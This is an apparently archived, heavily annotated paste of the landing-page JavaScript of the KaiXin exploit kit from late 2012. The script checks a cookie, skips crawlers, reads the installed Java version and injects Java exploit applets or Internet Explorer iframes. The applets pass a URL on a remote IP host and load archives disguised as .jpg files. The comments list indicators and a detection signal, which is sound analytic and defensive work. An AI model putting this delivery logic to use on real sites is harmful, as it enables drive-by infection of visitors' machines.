eromang

KaiXin Exploit Kit EK November 2012

Dec 5th, 2012
  // Captured landing-page script of the exploit kit named in the paste title.
  // Order of operations: (1) gate on a marker cookie and on crawler-looking user
  // agents, (2) derive a number from the installed Java runtime version via
  // deployJava, (3) inject one of four Java applets chosen by that number, or,
  // when the version test fails, (4) write an iframe chosen by Internet Explorer
  // version.
  //
  // Indicators visible in this listing: cookie name Udz1szV; host 204.13.66.197
  // with path /ins/rar.css; archive names xdwmA2Xd.jpg, lXjOhqg.jpg, obDb9.jpg,
  // MMWYD.jpg; iframe pages WysBRr.html and JSZlR.html; applet parameter names
  // dota, xiaomaolv, bn, si, bs with the values woyouyizhixiaomaolv,
  // conglaiyebuqi and 748; class names GondadGondadExp, gond1723.Gondattack,
  // cve2012xxxx.Gondvv, gond20125076.Gondqq.
  //
  // Detection note: every archive is referenced from an applet/OBJECT "archive"
  // attribute, where the Java plug-in expects a JAR (a ZIP container), yet each
  // name ends in .jpg. An applet or Java plug-in OBJECT whose archive carries an
  // image extension is a signal that does not depend on the file names, which
  // are presumably rotated per campaign (not verifiable from this listing).
  1. var RWkTTC8=navigator.userAgent.toLowerCase();
  // Gate: run only when the marker cookie is absent and the user agent contains
  // neither "bot" nor "spider". The cookie is set just below with a 24-hour
  // lifetime, so a repeat visit inside that window, or a crawler-like user
  // agent, sees none of the injected content. Keep this in mind when
  // re-fetching the page for analysis.
  2. if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && RWkTTC8.indexOf("spider")==-1)
  3. {
  4. var expires=new Date();
  5. expires.setTime(expires.getTime()+24*60*60*1000);
  6. document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();
  // Appends a second <body> element to the existing body. That element is not
  // referenced again in this listing (kaixiny is only reassigned later).
  7. var kaixiny=document.createElement('body');
  8. document.body.appendChild(kaixiny);
  // deployJava is not defined in this listing; the name and getJREs() match
  // Oracle's Java Deployment Toolkit script, presumably loaded by the hosting
  // page. The result is coerced to a string, "." and "_" are stripped and the
  // rest is parsed as an integer, so a version string such as 1.6.0_27 becomes
  // 16027. parseInt stops at the first non-digit: if getJREs() returns an array
  // of several versions, the comma-joined string yields only the first one.
  // With no version reported the result is NaN.
  9. var kaixinm=deployJava.getJREs()+"";
  10. kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));
  // NaN and any value above 17007 fail this test and go to the iframe branch at
  // listing line 82.
  11. if (kaixinm<=17007)
  12. {
  13.     var kaixin=document.createElement('applet');
  14.     kaixin.width="1";
  15.     kaixin.height="1";
          // Branch 1: values 16000-16027 and 15000-15031. 1x1 applet, class
          // GondadGondadExp.class, one parameter ("dota") carrying the URL;
          // what the applet does with that URL is not visible here.
  16.     if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))
  17.     {
  18.         kaixin.archive="xdwmA2Xd.jpg";     
  19.         kaixin.code="GondadGondadExp.class";
  20.         kaixin.setAttribute("dota","http://204.13.66.197/ins/rar.css");
  21.         document.body.appendChild(kaixin);
  22.     }
          // Branch 2: values 17000-17003, plus 16028-16032 (16000-16027 were
          // already taken by branch 1). The third clause (>=15035 && <=15000)
          // matches no number as written. The same URL is passed under the
          // name "xiaomaolv", together with bn, si and bs, whose meaning is
          // not visible from this script.
  23.     else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))
  24.     {
  25.         kaixin.archive="lXjOhqg.jpg";      
  26.         kaixin.code="gond1723.Gondattack.class";   
  27.         kaixin.setAttribute("xiaomaolv","http://204.13.66.197/ins/rar.css");   
  28.         kaixin.setAttribute("bn","woyouyizhixiaomaolv");
  29.         kaixin.setAttribute("si","conglaiyebuqi");
  30.         kaixin.setAttribute("bs","748");   
  31.         document.body.appendChild(kaixin);
  32.     }
          // Branch 3: effectively 17004-17006, since 17003 is consumed by
          // branch 2. User agents containing "msie 6" get an <OBJECT> with
          // classid 8AD9C840-044E-11D1-B3E9-00805F499D93 (the Java Plug-in
          // ActiveX control) written into the page; all others get an <applet>
          // element with the same class, archive and parameters. The sizes
          // here are 200x200 and 256x256, unlike the 1x1 used elsewhere.
          // The applet element created at listing line 13 is left unused in
          // this branch and the next.
  33.     else if (kaixinm<=17006 && kaixinm>=17003)
  34.     {
  35.         var ques3 = window.navigator.userAgent.toLowerCase();
  36.         if (ques3.indexOf("msie 6") > -1)
  37.         {
  38.             document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://204.13.66.197/ins/rar.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'obDb9.jpg'></OBJECT>");
  39.         }
  40.         else
  41.         {
  42.             document.write("<br>");
  43.             var kaixinq = document.createElement("body");
  44.             document.body.appendChild(kaixinq);
  45.             var kaixiny = document.createElement("applet");
  46.             kaixiny.width = "256";
  47.             kaixiny.height = "256";
  48.             kaixiny.archive = "obDb9.jpg";
  49.             kaixiny.code = "cve2012xxxx.Gondvv.class";
  50.             kaixiny.setAttribute("xiaomaolv", "http://204.13.66.197/ins/rar.css");
  51.             kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
  52.             kaixiny.setAttribute("si", "conglaiyebuqi");
  53.             kaixiny.setAttribute("bs", "748");
  54.             document.body.appendChild(kaixiny);
  55.         }
  56.     }
          // Branch 4: every remaining value at or below 17007, i.e. 17007
          // itself and anything the three tests above did not match (for
          // example 15032-15999 or 16033-16999). Same "msie 6" OBJECT/applet
          // split as branch 3, at 1x1, with class gond20125076.Gondqq.class
          // and archive MMWYD.jpg. The digits in the package name look like a
          // vulnerability reference; confirm against the archive contents.
  57.     else
  58.     {
  59.         var oxysy1 = window.navigator.userAgent.toLowerCase();
  60.         if (oxysy1.indexOf("msie 6") > -1)
  61.         {
  62.             document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='1' height='1'><param name=xiaomaolv value= 'http://204.13.66.197/ins/rar.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'gond20125076.Gondqq.class'><param name=archive value= 'MMWYD.jpg'></OBJECT>");
  63.         }
  64.         else
  65.         {
  66.             document.write("<br>");
  67.             var kaixinq = document.createElement("body");
  68.             document.body.appendChild(kaixinq);
  69.             var kaixiny = document.createElement("applet");
  70.             kaixiny.width = "1";
  71.             kaixiny.height = "1";
  72.             kaixiny.archive = "MMWYD.jpg";
  73.             kaixiny.code = "gond20125076.Gondqq.class";
  74.             kaixiny.setAttribute("xiaomaolv", "http://204.13.66.197/ins/rar.css");
  75.             kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
  76.             kaixiny.setAttribute("si", "conglaiyebuqi");
  77.             kaixiny.setAttribute("bs", "748");
  78.             document.body.appendChild(kaixiny);
  79.         }
  80.     }
  81. }
  // Non-Java fallback: reached when the derived number is above 17007 or NaN.
  // User agents containing "msie 8.0" get an iframe to WysBRr.html, "msie 6.0"
  // or "msie 7.0" get JSZlR.html; any other browser gets nothing. Both are
  // relative URLs whose content is not part of this listing. pcss is assigned
  // but never read here.
  82. else
  83. {
  84.  
  85.     var pcss=navigator.userAgent.toLowerCase();
  86.     var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
  87.     if ((UaYcKzD2.indexOf('msie 8.0') > -1))
  88.     {
  89.         document.writeln("<iframe src=WysBRr.html><\/iframe>");
  90.     }
  91.     else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
  92.     {
  93.         document.writeln("<iframe src=JSZlR.html><\/iframe>");
  94.  
  95.     }
  96. }
  97. }